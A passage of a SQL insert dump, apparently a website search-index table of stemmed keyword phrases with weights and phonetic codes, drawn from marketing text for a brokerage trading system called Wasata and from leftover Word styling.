accomplish',0,1,1.5,'W425142',1,'en'),(9953,'will accomplish our','will accomplish our',0,1,1.6333,'W4251426',1,'en'),(9954,'with offices','with offices',0,1,1.4,'W312',1,'en'),(9955,'with offices in','with offices in',0,1,1.5,'W3125',1,'en'),(9956,'with the','with the',0,1,1.2667,'W300',8,'en'),(9957,'with the regional','with the regional',0,1,1.5667,'W36254',1,'en'),(9958,'without','without',1,0,0.0583,'W300',2,'en'),(9959,'without loosing','without loosing',0,1,1.5,'W34252',1,'en'),(9960,'without loosing the','without loosing the',0,1,1.6333,'W342523',1,'en'),(9961,'working','work',0,0,0.4667,'W6252',5,'en'),(9962,'working closely','work closely',0,1,1.5,'W6252424',1,'en'),(9963,'working closely with','work closely with',0,1,1.6667,'W62524243',1,'en'),(10055,'for the','for the',0,1,1.2333,'F630',12,'en'),(10160,'system','system',0,0,0.4,'S350',10,'en'),(10526,'a very','a very',0,1,1.2,'A160',2,'en'),(10535,'and the','and the',0,1,1.2333,'A530',7,'en'),(10537,'approach','approach',0,0,0.5333,'A162',1,'en'),(10546,'based on','base on',0,1,1.2667,'B235',3,'en'),(10548,'both the','both the',0,1,1.2667,'B300',1,'en'),(10570,'committed','commit',0,0,0.6,'C530',1,'en'),(10582,'cost','cost',0,0,0.2667,'C300',6,'en'),(10583,'cost of','cost of',0,1,1.2333,'C310',1,'en'),(10591,'enjoy','enjoi',0,0,0.3333,'E520',1,'en'),(10602,'for a','for a',0,1,1.1667,'F600',5,'en'),(10607,'from','from',1,0,0.0333,'F650',16,'en'),(10619,'just a','just a',0,1,1.2,'J300',2,'en'),(10621,'know','know',0,0,0.2667,'K500',3,'en'),(10632,'low','low',0,0,0.2,'L000',1,'en'),(10637,'more','more',1,0,0.0333,'M600',13,'en'),(10638,'more than','more than',0,1,1.3,'M635',1,'en'),(10654,'on a','on a',0,1,1.1333,'O500',5,'en'),(10656,'only','onli',1,0,0.0333,'O540',9,'en'),(10670,'provided to','provid to',0,1,1.3667,'P613',1,'en'),(10674,'quality','qualiti',0,0,0.4667,'Q430',3,'en'),(10677,'resulting','result',0,0,0.6,'R24352',2,'en'),(10701,'staff','staff',0,0,0.3333,'S310',1,'en'),(10710,'than','than',1,0,0.0333,'T500',6,'en'),(10719,'the cost','the cost',0,1,1.2667,'T230',2,'en'),(10720,'the cost of','the cost of',0,1,1.3667,'T231',1,'en'),(10723,'the services','the services',0,1,1.4,'T2612',1,'en'),(10725,'the time','the time',0,1,1.2667,'T500',1,'en'),(10729,'their','their',1,0,0.0417,'T600',9,'en'),(10732,'through','through',0,0,0.4667,'T620',6,'en'),(10733,'through the','through the',0,1,1.3667,'T623',2,'en'),(10735,'time','time',1,0,0.0333,'T500',14,'en'),(10736,'time to','time to',0,1,1.2333,'T530',1,'en'),(10738,'to a','to a',0,1,1.1333,'T000',2,'en'),(10744,'truly','truli',0,0,0.3333,'T640',2,'en'),(10757,'very','veri',1,0,0.0333,'V600',7,'en'),(10760,'very well','veri well',0,1,1.3,'V640',1,'en'),(10762,'we are','we are',0,1,1.2,'W600',1,'en'),(10775,'while','while',0,0,0.3333,'W400',8,'en'),(10783,'years','year',0,0,0.3333,'Y620',7,'en'),(10786,'116','116',0,0,0.3,'',1,'en'),(10787,'a complete','a complete',0,1,1.3333,'A25143',1,'en'),(10788,'a complete trading','a complete trading',0,1,1.6,'A251436352',1,'en'),(10789,'a set','a set',0,1,1.1667,'A230',1,'en'),(10790,'a set of','a set of',0,1,1.2667,'A231',1,'en'),(10791,'a user','a user',0,1,1.2,'A260',1,'en'),(10792,'a user friendly','a user friendly',0,1,1.5,'A2616534',1,'en'),(10793,'administration','administr',0,0,0.9333,'A3523635',2,'en'),(10794,'administration of','administr of',0,1,1.5667,'A35236351',2,'en'),(10795,'administration of securities','administr of securities',0,1,1.9333,'A352363512632',1,'en'),(10796,'an','an',1,0,0.0167,'A500',17,'en'),(10797,'an integrated','an integrated',0,1,1.4333,'A53263',1,'en'),(10798,'an integrated mode','an integrated mode',0,1,1.6,'A5326353',1,'en'),(10799,'and effective','and effective',0,1,1.4333,'A531231',1,'en'),(10800,'and effective electronic','and effective electronic',0,1,1.8,'A531231423652',1,'en'),(10801,'and other stakeholders','and other stakeholders',0,1,1.7333,'A5362324362',1,'en'),(10802,'asset','asset',0,0,0.3333,'A230',1,'en'),(10803,'asset management','asset management',0,1,1.5333,'A235253',1,'en'),(10804,'asset management order','asset management order',0,1,1.7333,'A235253636',1,'en'),(10805,'banks','bank',0,0,0.3333,'B520',1,'en'),(10806,'banks brokerage','bank brokerage',0,1,1.5,'B5216262',1,'en'),(10807,'banks brokerage companies','bank brokerage companies',0,1,1.8333,'B52162625152',1,'en'),(10808,'brokerage companies','brokerag companies',0,1,1.6333,'B62625152',1,'en'),(10809,'brokerage companies and','brokerag companies and',0,1,1.7667,'B6262515253',1,'en'),(10810,'brokerage management solution','brokerag management solution',0,1,1.9667,'B626252532435',2,'en'),(10811,'capital','capit',0,0,0.4667,'C134',1,'en'),(10812,'capital markets','capit markets',0,1,1.5,'C13456232',1,'en'),(10813,'capital markets wasata','capit markets wasata',0,1,1.7333,'C134562323',1,'en'),(10814,'collections','collect',0,0,0.7333,'C42352',2,'en'),(10815,'collections and','collect and',0,1,1.5,'C4235253',1,'en'),(10816,'companies','compani',0,0,0.6,'C5152',3,'en'),(10817,'companies and','compani and',0,1,1.4333,'C515253',2,'en'),(10818,'companies and other','compani and other',0,1,1.6333,'C5152536',1,'en'),(10819,'complete','complet',0,0,0.5333,'C5143',3,'en'),(10820,'complete trading','complet trading',0,1,1.5333,'C51436352',1,'en'),(10821,'complete trading system','complet trading system',0,1,1.7667,'C5143635235',1,'en'),(10822,'developed to','develop to',0,1,1.4,'D1413',1,'en'),(10823,'developed to manage','develop to manage',0,1,1.6333,'D141352',1,'en'),(10824,'developed to provide','develop to provide',0,1,1.6667,'D14131613',1,'en'),(10825,'distribution','distribut',0,0,0.8,'D236135',1,'en'),(10826,'distribution of','distribut of',0,1,1.5,'D2361351',1,'en'),(10827,'distribution of financial','distribut of financial',0,1,1.8333,'D2361351524',1,'en'),(10828,'effective','effect',0,0,0.6,'E1231',2,'en'),(10829,'effective electronic','effect electronic',0,1,1.6667,'E1231423652',1,'en'),(10830,'effective electronic trading','effect electronic trading',0,1,1.9333,'E123142365236352',1,'en'),(10831,'electronic','electron',0,0,0.6667,'E423652',3,'en'),(10832,'electronic trading','electron trading',0,1,1.6,'E42365236352',1,'en'),(10833,'electronic trading system','electron trading system',0,1,1.8333,'E4236523635235',1,'en'),(10834,'fast','fast',0,0,0.2667,'F230',3,'en'),(10835,'fast and','fast and',0,1,1.2667,'F2353',1,'en'),(10836,'fast and effective','fast and effective',0,1,1.6,'F23531231',1,'en'),(10837,'financial products','financi products',0,1,1.6,'F524163232',1,'en'),(10838,'for banks','for banks',0,1,1.3,'F6152',1,'en'),(10839,'for banks brokerage','for banks brokerage',0,1,1.6333,'F615216262',1,'en'),(10840,'for the administration','for the administration',0,1,1.7333,'F63523635',1,'en'),(10841,'friendly','friendli',0,0,0.5333,'F6534',2,'en'),(10842,'friendly fast','friendli fast',0,1,1.4333,'F6534123',1,'en'),(10843,'friendly fast and','friendli fast and',0,1,1.5667,'F653412353',1,'en'),(10844,'functionalities','function',0,0,1,'F5235432',1,'en'),(10845,'functionalities required','function required',0,1,1.8,'F52354326263',1,'en'),(10846,'functionalities required for','function required for',0,1,1.9333,'F5235432626316',1,'en'),(10847,'in an','in an',0,1,1.1667,'I500',1,'en'),(10848,'in an integrated','in an integrated',0,1,1.5333,'I53263',1,'en'),(10849,'in capital','in capital',0,1,1.3333,'I52134',1,'en'),(10850,'in capital markets','in capital markets',0,1,1.6,'I5213456232',1,'en'),(10851,'integrated','integr',0,0,0.6667,'I53263',1,'en'),(10852,'integrated mode','integr mode',0,1,1.5,'I5326353',1,'en'),(10853,'integrated mode the','integr mode the',0,1,1.6333,'I5326353',1,'en'),(10854,'investment soltuions','invest soltuions',0,1,1.6667,'I51235324352',1,'en'),(10855,'involved','involv',0,0,0.5333,'I51413',2,'en'),(10856,'involved in','involv in',0,1,1.3667,'I514135',2,'en'),(10857,'involved in capital','involv in capital',0,1,1.6333,'I5141352134',1,'en'),(10858,'is a complete','is a complete',0,1,1.4333,'I25143',1,'en'),(10859,'is a set','is a set',0,1,1.2667,'I230',1,'en'),(10860,'manage','manag',0,0,0.4,'M200',2,'en'),(10861,'manage in','manag in',0,1,1.3,'M250',1,'en'),(10862,'manage in an','manag in an',0,1,1.4,'M250',1,'en'),(10863,'management order collections','manag order collections',0,1,1.9333,'M253636242352',1,'en'),(10864,'management solution wasata','manag solution wasata',0,1,1.8667,'M253243523',2,'en'),(10865,'markets wasata','market wasata',0,1,1.4667,'M62323',1,'en'),(10866,'markets wasata is','market wasata is',0,1,1.5667,'M623232',1,'en'),(10867,'mode','mode',0,0,0.2667,'M300',2,'en'),(10868,'mode the','mode the',0,1,1.2667,'M300',1,'en'),(10869,'mode the functionalities','mode the functionalities',0,1,1.8,'M315235432',1,'en'),(10870,'modules','modul',0,0,0.4667,'M342',1,'en'),(10871,'modules developed','modul developed',0,1,1.5667,'M34231413',1,'en'),(10872,'modules developed to','modul developed to',0,1,1.6667,'M34231413',1,'en'),(10873,'of financial','of financial',0,1,1.4,'O1524',2,'en'),(10874,'of financial products','of financial products',0,1,1.7,'O1524163232',1,'en'),(10875,'of modules','of modules',0,1,1.3333,'O15342',1,'en'),(10876,'of modules developed','of modules developed',0,1,1.6667,'O1534231413',1,'en'),(10877,'of securities','of securities',0,1,1.4333,'O12632',1,'en'),(10878,'of securities asset','of securities asset',0,1,1.6333,'O126323',1,'en'),(10879,'order collections','order collections',0,1,1.5667,'O636242352',1,'en'),(10880,'order collections and','order collections and',0,1,1.7,'O63624235253',1,'en'),(10881,'other stakeholders','other stakeholders',0,1,1.6,'O362324362',1,'en'),(10882,'other stakeholders involved','other stakeholders involved',0,1,1.9,'O36232436251413',1,'en'),(10883,'products investment','product investment',0,1,1.6333,'P63232512353',1,'en'),(10884,'products investment soltuions','product investment soltuions',0,1,1.9667,'P6323251235324352',1,'en'),(10885,'provide a','provid a',0,1,1.3,'P613',1,'en'),(10886,'provide a user','provid a user',0,1,1.4667,'P61326',1,'en'),(10887,'required','requir',0,0,0.5333,'R263',2,'en'),(10888,'required for','requir for',0,1,1.4,'R26316',2,'en'),(10889,'required for the','requir for the',0,1,1.5333,'R263163',1,'en'),(10890,'securities asset','secur asset',0,1,1.5333,'S6323',1,'en'),(10891,'securities asset management','secur asset management',0,1,1.9,'S63235253',1,'en'),(10892,'set','set',0,0,0.2,'S300',5,'en'),(10893,'set of','set of',0,1,1.2,'S310',2,'en'),(10894,'set of modules','set of modules',0,1,1.4667,'S315342',1,'en'),(10895,'soltuions','soltuion',0,0,0.6,'S4352',1,'en'),(10896,'solution wasata','solut wasata',0,1,1.5,'S43523',2,'en'),(10897,'solution wasata wasata','solut wasata wasata',0,1,1.7333,'S4352323',1,'en'),(10898,'stakeholders','stakehold',0,0,0.8,'S324362',1,'en'),(10899,'stakeholders involved','stakehold involved',0,1,1.7,'S32436251413',1,'en'),(10900,'stakeholders involved in','stakehold involved in',0,1,1.8,'S324362514135',1,'en'),(10901,'system developed','system developed',0,1,1.5333,'S3531413',1,'en'),(10902,'system developed to','system developed to',0,1,1.6333,'S3531413',1,'en'),(10903,'system for','system for',0,1,1.3333,'S3516',2,'en'),(10904,'system for banks','system for banks',0,1,1.5333,'S3516152',1,'en'),(10905,'the administration','the administration',0,1,1.6,'T523635',1,'en'),(10906,'the administration of','the administration of',0,1,1.7,'T5236351',1,'en'),(10907,'the functionalities','the functionalities',0,1,1.6333,'T15235432',1,'en'),(10908,'the functionalities required','the functionalities required',0,1,1.9333,'T152354326263',1,'en'),(10909,'to manage','to manage',0,1,1.3,'T520',1,'en'),(10910,'to manage in','to manage in',0,1,1.4,'T525',1,'en'),(10911,'to provide','to provide',0,1,1.3333,'T1613',1,'en'),(10912,'to provide a','to provide a',0,1,1.4,'T1613',1,'en'),(10913,'trading system','trade system',0,1,1.4667,'T635235',2,'en'),(10914,'trading system developed','trade system developed',0,1,1.8,'T63523531413',1,'en'),(10915,'trading system for','trade system for',0,1,1.6,'T63523516',1,'en'),(10916,'user friendly','user friendly',0,1,1.4333,'U2616534',1,'en'),(10917,'user friendly fast','user friendly fast',0,1,1.6,'U2616534123',1,'en'),(10918,'wasata','wasata',0,0,0.4,'W230',2,'en'),(10919,'wasata is','wasata is',0,1,1.3,'W232',1,'en'),(10920,'wasata is a','wasata is a',0,1,1.3667,'W232',1,'en'),(10921,'wasata wasata','wasata wasata',0,1,1.4333,'W2323',1,'en'),(10922,'wasata wasata is','wasata wasata is',0,1,1.5333,'W23232',1,'en'),(10952,'supportlists','supportlist',0,0,0.8,'S1634232',1,'en'),(11411,'2','2',0,0,0.1,'',8,'en'),(11414,'3','3',0,0,0.1,'',5,'en'),(11417,'4','4',0,0,0.1,'',3,'en'),(11431,'and maintenance','and maintenance',0,1,1.5,'A535352',2,'en'),(11436,'application','applic',0,0,0.7333,'A14235',3,'en'),(11463,'company','compani',0,0,0.4667,'C515',9,'en'),(11489,'design','design',0,0,0.4,'D250',6,'en'),(11540,'ipo','ipo',0,0,0.2,'I100',3,'en'),(11541,'ipo manager','ipo manager',0,1,1.3667,'I1526',3,'en'),(11555,'maintenance','mainten',0,0,0.7333,'M352',2,'en'),(11565,'manager','manag',0,0,0.4667,'M260',4,'en'),(11573,'mso-bidi-font-family','mso-bidi-font-famili',0,0,1,'M213153154',1,'en'),(11602,'real','real',0,0,0.2667,'R400',5,'en'),(11603,'real time','real time',0,1,1.3,'R435',3,'en'),(11657,'the system','the system',0,1,1.3333,'T235',2,'en'),(11684,'\'century','centuri',0,0,0.5333,'C536',1,'en'),(11685,'\'century gothic\'','centuri gothic',0,1,1.5333,'C536232',1,'en'),(11686,'\'century gothic\' d','centuri gothic d',0,1,1.6,'C5362323',1,'en'),(11687,'\'century gothic\' mso-bidi-font-family','centuri gothic mso-bidi-font-family',0,1,2,'C5362325213153154',1,'en'),(11688,'\'times','time',0,0,0.4,'T520',1,'en'),(11689,'\'times new','time new',0,1,1.3333,'T525',1,'en'),(11690,'\'times new roman\'','time new roman',0,1,1.5667,'T52565',1,'en'),(11692,'a online','a online',0,1,1.2667,'A545',1,'en'),(11701,'auto','auto',0,0,0.2667,'A300',1,'en'),(11704,'b','b',0,0,0.0667,'B000',4,'en'),(11713,'banking','bank',0,0,0.4667,'B5252',1,'en'),(11716,'c','c',0,0,0.0667,'C000',5,'en'),(11733,'core banking','core banking',0,1,1.4,'C615252',1,'en'),(11735,'d','d',0,0,0.0667,'D000',7,'en'),(11738,'details','detail',0,0,0.4667,'D420',6,'en'),(11739,'e','e',0,0,0.0667,'E000',10,'en'),(11742,'f','f',0,0,0.0667,'F000',4,'en'),(11745,'font-family','font-famili',0,0,0.7333,'F53154',1,'en'),(11746,'font-family \'times','font-famili times',0,1,1.6,'F53154352',1,'en'),(11747,'font-family \'times new','font-famili times new',0,1,1.7333,'F531543525',1,'en'),(11748,'g','g',0,0,0.0667,'G000',3,'en'),(11749,'gothic\'','gothic',0,0,0.4667,'G320',1,'en'),(11750,'gothic\' d','gothic d',0,1,1.3,'G323',1,'en'),(11752,'gothic\' mso-bidi-font-family','gothic mso-bidi-font-family',0,1,1.9333,'G325213153154',1,'en'),(11753,'gothic\' mso-bidi-font-family \'century','gothic mso-bidi-font-family century',0,1,2,'G3252131531542536',1,'en'),(11754,'gothic\',sans-serif','gothic',0,0,1,'G325261',1,'en'),(11755,'gothic\',sans-serif mso-fareast-font-family','gothic mso-fareast-font-family',0,1,2,'G325261521623153154',1,'en'),(11756,'gothic\',sans-serif mso-fareast-font-family \'century','gothic mso-fareast-font-family century',0,1,2,'G3252615216231531542536',1,'en'),(11757,'h','h',0,0,0.0667,'H000',3,'en'),(11760,'i','i',0,0,0.0667,'I000',15,'en'),(11763,'integration with','integr with',0,1,1.5333,'I5326353',2,'en'),(11776,'more details','more details',0,1,1.4,'M6342',4,'en'),(11777,'mso-bidi-font-family \'century','mso-bidi-font-famili century',0,1,1.9667,'M2131531542536',1,'en'),(11778,'mso-bidi-font-family \'century gothic\'','mso-bidi-font-famili century gothic',0,1,2,'M2131531542536232',1,'en'),(11779,'mso-fareast-font-family','mso-fareast-font-famili',0,0,1,'M21623153154',1,'en'),(11780,'mso-fareast-font-family \'century','mso-fareast-font-famili century',0,1,2,'M216231531542536',1,'en'),(11781,'mso-fareast-font-family \'century gothic\'','mso-fareast-font-famili century gothic',0,1,2,'M216231531542536232',1,'en'),(11782,'new','new',1,0,0.025,'N000',13,'en'),(11783,'new roman\'','new roman',0,1,1.3333,'N650',1,'en'),(11784,'new roman\' swift','new roman swift',0,1,1.5333,'N65213',1,'en'),(11785,'normal','normal',0,0,0.4,'N654',2,'en'),(11786,'normal font-family','normal font-family',0,1,1.6,'N654153154',1,'en'),(11787,'normal font-family \'times','normal font-family times',0,1,1.8333,'N654153154352',1,'en'),(11790,'online','onlin',0,0,0.4,'O545',4,'en'),(11796,'roman\'','roman',0,0,0.4,'R500',1,'en'),(11797,'roman\' swift','roman swift',0,1,1.4,'R5213',1,'en'),(11813,'swift','swift',0,0,0.3333,'S130',1,'en'),(12036,'120','120',0,0,0.3,'',2,'en'),(12046,'call','call',0,0,0.2667,'C400',3,'en'),(12047,'call center','call center',0,1,1.3667,'C42536',1,'en'),(12049,'center','center',0,0,0.4,'C536',3,'en'),(12060,'d multi','d multi',0,1,1.2333,'D543',1,'en'),(12064,'different','differ',0,0,0.6,'D1653',8,'en'),(12075,'gothic\' d multi','gothic d multi',0,1,1.5,'G323543',1,'en'),(12082,'line','line',0,0,0.2667,'L500',6,'en'),(12095,'multi','multi',0,0,0.3333,'M430',2,'en'),(12124,'system c','system c',0,1,1.2667,'S352',1,'en'),(12126,'trade','trade',0,0,0.3333,'T630',2,'en'),(12140,'121','121',0,0,0.3,'',1,'en'),(12141,'a flexibility','a flexibility',0,1,1.4333,'A142143',1,'en'),(12142,'a flexibility of','a flexibility of',0,1,1.5333,'A1421431',1,'en'),(12143,'advance','advanc',0,0,0.4667,'A3152',1,'en'),(12144,'advance menu','advanc menu',0,1,1.4,'A31525',1,'en'),(12145,'advance menu driven','advanc menu driven',0,1,1.6333,'A315253615',1,'en'),(12146,'among the','among the',0,1,1.3,'A523',3,'en'),(12147,'among the screens','among the screens',0,1,1.5667,'A5232652',1,'en'),(12148,'and connectivity','and connectivity',0,1,1.5333,'A53252313',1,'en'),(12149,'and connectivity among','and connectivity among',0,1,1.7333,'A5325231352',1,'en'),(12150,'and order','and order',0,1,1.3,'A53636',1,'en'),(12151,'and order routing','and order routing',0,1,1.5667,'A53636352',1,'en'),(12152,'b online','b online',0,1,1.2667,'B545',1,'en'),(12153,'b online integration','b online integration',0,1,1.6667,'B54532635',1,'en'),(12154,'back','back',0,0,0.2667,'B200',9,'en'),(12155,'back office','back office',0,1,1.3667,'B212',2,'en'),(12156,'back office system','back office system',0,1,1.6,'B21235',2,'en'),(12157,'based solution','base solution',0,1,1.4667,'B232435',1,'en'),(12158,'c real','c real',0,1,1.2,'C640',1,'en'),(12159,'c real time','c real time',0,1,1.3667,'C6435',1,'en'),(12160,'connectivity','connect',0,0,0.8,'C52313',1,'en'),(12161,'connectivity among','connect among',0,1,1.6,'C5231352',1,'en'),(12162,'connectivity among the','connect among the',0,1,1.7333,'C52313523',1,'en'),(12163,'coupling','coupl',0,0,0.5333,'C1452',1,'en'),(12164,'coupling and','coupl and',0,1,1.4,'C145253',1,'en'),(12165,'coupling and connectivity','coupl and connectivity',0,1,1.8333,'C145253252313',1,'en'),(12166,'d multi tabs','d multi tabs',0,1,1.4,'D54312',1,'en'),(12167,'data processing','data processing',0,1,1.5,'D16252',1,'en'),(12168,'data processing and','data processing and',0,1,1.6333,'D1625253',1,'en'),(12169,'design b','design b',0,1,1.2667,'D251',1,'en'),(12170,'design b online','design b online',0,1,1.5,'D251545',1,'en'),(12171,'design e','design e',0,1,1.2667,'D250',1,'en'),(12172,'design e tightly','design e tightly',0,1,1.5333,'D253234',1,'en'),(12173,'different screens','differ screens',0,1,1.5667,'D16532652',1,'en'),(12174,'different screens i','differ screens i',0,1,1.6333,'D16532652',1,'en'),(12175,'driven','driven',0,0,0.4,'D615',1,'en'),(12176,'driven system','driven system',0,1,1.4333,'D615235',1,'en'),(12177,'driven system g','driven system g',0,1,1.5,'D6152352',1,'en'),(12178,'e tightly','e tightly',0,1,1.3,'E3234',1,'en'),(12179,'e tightly coupling','e tightly coupling',0,1,1.6,'E323421452',1,'en'),(12180,'e trade','e trade',0,1,1.2333,'E363',1,'en'),(12181,'e trade web','e trade web',0,1,1.3667,'E3631',1,'en'),(12182,'e-trade','e-trade',0,0,0.4667,'E363',1,'en'),(12183,'e-trade design','e-trade design',0,1,1.4667,'E36325',1,'en'),(12184,'e-trade design b','e-trade design b',0,1,1.5333,'E363251',1,'en'),(12185,'e-trade web','e-trade web',0,1,1.3667,'E3631',1,'en'),(12186,'e-trade web based','e-trade web based',0,1,1.5667,'E363123',1,'en'),(12187,'entry','entri',0,0,0.3333,'E536',4,'en'),(12188,'entry screen','entri screen',0,1,1.4,'E536265',1,'en'),(12189,'entry screen more','entri screen more',0,1,1.5667,'E5362656',1,'en'),(12190,'execution','execut',0,0,0.6,'E235',1,'en'),(12191,'execution from','execut from',0,1,1.4667,'E235165',1,'en'),(12192,'execution from different','execut from different',0,1,1.8,'E23516531653',1,'en'),(12193,'f advance','f advance',0,1,1.3,'F3152',1,'en'),(12194,'f advance menu','f advance menu',0,1,1.4667,'F31525',1,'en'),(12195,'flexibility','flexibl',0,0,0.7333,'F42143',1,'en'),(12196,'flexibility of','flexibl of',0,1,1.4667,'F421431',1,'en'),(12197,'flexibility of e-trade','flexibl of e-trade',0,1,1.7333,'F421431363',1,'en'),(12198,'from different','from different',0,1,1.4667,'F6531653',1,'en'),(12199,'from different screens','from different screens',0,1,1.7333,'F65316532652',1,'en'),(12200,'gothic\',sans-serif high','gothic high',0,1,1.7667,'G3252612',1,'en'),(12201,'gothic\',sans-serif high performance','gothic high performance',0,1,2,'G3252612161652',1,'en'),(12202,'h order','h order',0,1,1.2333,'H636',1,'en'),(12203,'h order execution','h order execution',0,1,1.5667,'H636235',1,'en'),(12204,'high','high',0,0,0.2667,'H200',8,'en'),(12205,'high performance','high performance',0,1,1.5333,'H2161652',1,'en'),(12206,'high performance data','high performance data',0,1,1.7,'H21616523',1,'en'),(12207,'i quick','i quick',0,1,1.2333,'I200',1,'en'),(12208,'i quick order','i quick order',0,1,1.4333,'I2636',1,'en'),(12209,'integration with back','integr with back',0,1,1.7,'I532635312',2,'en'),(12210,'menu driven','menu driven',0,1,1.3667,'M3615',1,'en'),(12211,'menu driven system','menu driven system',0,1,1.6,'M3615235',1,'en'),(12212,'multi tabs','multi tabs',0,1,1.3333,'M4312',1,'en'),(12213,'multi tabs design','multi tabs design',0,1,1.5667,'M4312325',1,'en'),(12214,'of e-trade','of e-trade',0,1,1.3333,'O1363',1,'en'),(12215,'of e-trade design','of e-trade design',0,1,1.5667,'O136325',1,'en'),(12216,'office','offic',0,0,0.4,'O120',4,'en'),(12217,'office system','offic system',0,1,1.4333,'O1235',2,'en'),(12218,'office system c','offic system c',0,1,1.5,'O12352',1,'en'),(12219,'online integration','onlin integration',0,1,1.6,'O54532635',2,'en'),(12220,'online integration with','onlin integration with',0,1,1.7667,'O545326353',2,'en'),(12221,'order entry','order entry',0,1,1.3667,'O636536',1,'en'),(12222,'order entry screen','order entry screen',0,1,1.6,'O636536265',1,'en'),(12223,'order execution','order execution',0,1,1.5,'O636235',1,'en'),(12224,'order execution from','order execution from',0,1,1.6667,'O636235165',1,'en'),(12225,'order routing','order routing',0,1,1.4333,'O636352',2,'en'),(12226,'order routing h','order routing h',0,1,1.5,'O636352',1,'en'),(12227,'performance','perform',0,0,0.7333,'P61652',1,'en'),(12228,'performance data','perform data',0,1,1.5333,'P616523',1,'en'),(12229,'performance data processing','perform data processing',0,1,1.9,'P61652316252',1,'en'),(12230,'prices','price',0,0,0.4,'P620',2,'en'),(12231,'processing','process',0,0,0.6667,'P6252',2,'en'),(12232,'processing and','process and',0,1,1.4667,'P625253',1,'en'),(12233,'processing and order','process and order',0,1,1.6667,'P625253636',1,'en'),(12234,'quick','quick',0,0,0.3333,'Q000',1,'en'),(12235,'quick order','quick order',0,1,1.3667,'Q636',1,'en'),(12236,'quick order entry','quick order entry',0,1,1.5667,'Q636536',1,'en'),(12237,'real time prices','real time prices',0,1,1.5333,'R435162',1,'en'),(12238,'routing','rout',0,0,0.4667,'R352',2,'en'),(12239,'routing h','rout h',0,1,1.3,'R352',1,'en'),(12240,'routing h order','rout h order',0,1,1.5,'R352636',1,'en'),(12241,'screen','screen',0,0,0.4,'S650',4,'en'),(12242,'screen more','screen more',0,1,1.3667,'S656',1,'en'),(12243,'screen more details','screen more details',0,1,1.6333,'S656342',1,'en'),(12244,'screens','screen',0,0,0.4667,'S652',3,'en'),(12245,'screens f','screen f',0,1,1.3,'S6521',1,'en'),(12246,'screens f advance','screen f advance',0,1,1.5667,'S65213152',1,'en'),(12247,'screens i','screen i',0,1,1.3,'S652',1,'en'),(12248,'screens i quick','screen i quick',0,1,1.5,'S652',1,'en'),(12249,'system c real','system c real',0,1,1.4333,'S35264',1,'en'),(12250,'system g','system g',0,1,1.2667,'S352',1,'en'),(12251,'tabs','tab',0,0,0.2667,'T120',1,'en'),(12252,'tabs design','tab design',0,1,1.3667,'T12325',1,'en'),(12253,'tabs design e','tab design e',0,1,1.4333,'T12325',1,'en'),(12254,'the screens','the screens',0,1,1.3667,'T2652',1,'en'),(12255,'the screens f','the screens f',0,1,1.4333,'T26521',1,'en'),(12256,'tightly','tightli',0,0,0.4667,'T234',1,'en'),(12257,'tightly coupling','tightli coupling',0,1,1.5333,'T23421452',1,'en'),(12258,'tightly coupling and','tightli coupling and',0,1,1.6667,'T2342145253',1,'en'),(12259,'time prices','time prices',0,1,1.3667,'T5162',1,'en'),(12260,'trade web','trade web',0,1,1.3,'T631',1,'en'),(12261,'trade web based','trade web based',0,1,1.5,'T63123',1,'en'),(12262,'web','web',0,0,0.2,'W100',7,'en'),(12263,'web based','web based',0,1,1.3,'W123',1,'en'),(12264,'web based solution','web based solution',0,1,1.6,'W1232435',1,'en'),(12265,'with back','with back',0,1,1.3,'W312',2,'en'),(12266,'with back office','with back office',0,1,1.5333,'W31212',2,'en'),(12380,'-.25in','-.25in',0,0,0.4,'I500',1,'en'),(12381,'-.25in mso-list','-.25in mso-list',0,1,1.5,'I52423',1,'en'),(12382,'-.25in mso-list l0','-.25in mso-list l0',0,1,1.6,'I524234',1,'en'),(12383,'122','122',0,0,0.3,'',1,'en'),(12384,'a online integration','a online integration',0,1,1.6667,'A54532635',1,'en'),(12385,'a range','a range',0,1,1.2333,'A652',2,'en'),(12386,'a range of','a range of',0,1,1.3333,'A6521',2,'en'),(12387,'across','across',0,0,0.4,'A262',4,'en'),(12388,'across a','across a',0,1,1.2667,'A262',1,'en'),(12389,'across a range','across a range',0,1,1.4667,'A262652',1,'en'),(12390,'android','android',0,0,0.4667,'A5363',1,'en'),(12391,'android windows','android windows',0,1,1.5,'A5363532',1,'en'),(12392,'android windows phone','android windows phone',0,1,1.7,'A536353215',1,'en'),(12393,'app','app',0,0,0.2,'A100',2,'en'),(12394,'app will','app will',0,1,1.2667,'A140',1,'en'),(12395,'app will work','app will work',0,1,1.4333,'A1462',1,'en'),(12396,'auto text-indent','auto text-indent',0,1,1.5333,'A3235353',1,'en'),(12397,'auto text-indent -.25in','auto text-indent -.25in',0,1,1.7667,'A32353535',1,'en'),(12398,'b compatibility','b compatibility',0,1,1.5,'B2513143',1,'en'),(12399,'b compatibility across','b compatibility across',0,1,1.7333,'B2513143262',1,'en'),(12400,'blackberry','blackberri',0,0,0.6667,'B4216',1,'en'),(12401,'blackberry c','blackberri c',0,1,1.4,'B42162',1,'en'),(12402,'blackberry c easy','blackberri c easy',0,1,1.5667,'B42162',1,'en'),(12403,'c easy','c easy',0,1,1.2,'C000',1,'en'),(12404,'c easy installation','c easy installation',0,1,1.6333,'C523435',1,'en'),(12405,'charts','chart',0,0,0.4,'C632',1,'en'),(12406,'charts more','chart more',0,1,1.3667,'C63256',1,'en'),(12407,'charts more details','chart more details',0,1,1.6333,'C63256342',1,'en'),(12408,'compatibility','compat',0,0,0.8667,'C513143',1,'en'),(12409,'compatibility across','compat across',0,1,1.6667,'C513143262',1,'en'),(12410,'compatibility across a','compat across a',0,1,1.7333,'C513143262',1,'en'),(12411,'d graphs','d graphs',0,1,1.2667,'D2612',1,'en'),(12412,'d graphs charts','d graphs charts',0,1,1.5,'D2612632',1,'en'),(12413,'devices','devic',0,0,0.4667,'D120',4,'en'),(12414,'devices html5','devic html5',0,1,1.4333,'D12354',1,'en'),(12415,'devices html5 app','devic html5 app',0,1,1.5667,'D123541',1,'en'),(12416,'different mobile','differ mobile',0,1,1.5333,'D1653514',1,'en'),(12417,'different mobile os\'s','differ mobile os',0,1,1.7,'D16535142',1,'en'),(12418,'easy installation','easi installation',0,1,1.5667,'E2523435',1,'en'),(12419,'easy installation and','easi installation and',0,1,1.7,'E25234353',1,'en'),(12420,'graphs','graph',0,0,0.4,'G612',1,'en'),(12421,'graphs charts','graph charts',0,1,1.4333,'G612632',1,'en'),(12422,'graphs charts more','graph charts more',0,1,1.6,'G61263256',1,'en'),(12423,'html5 app','html5 app',0,1,1.3,'H3541',1,'en'),(12424,'html5 app will','html5 app 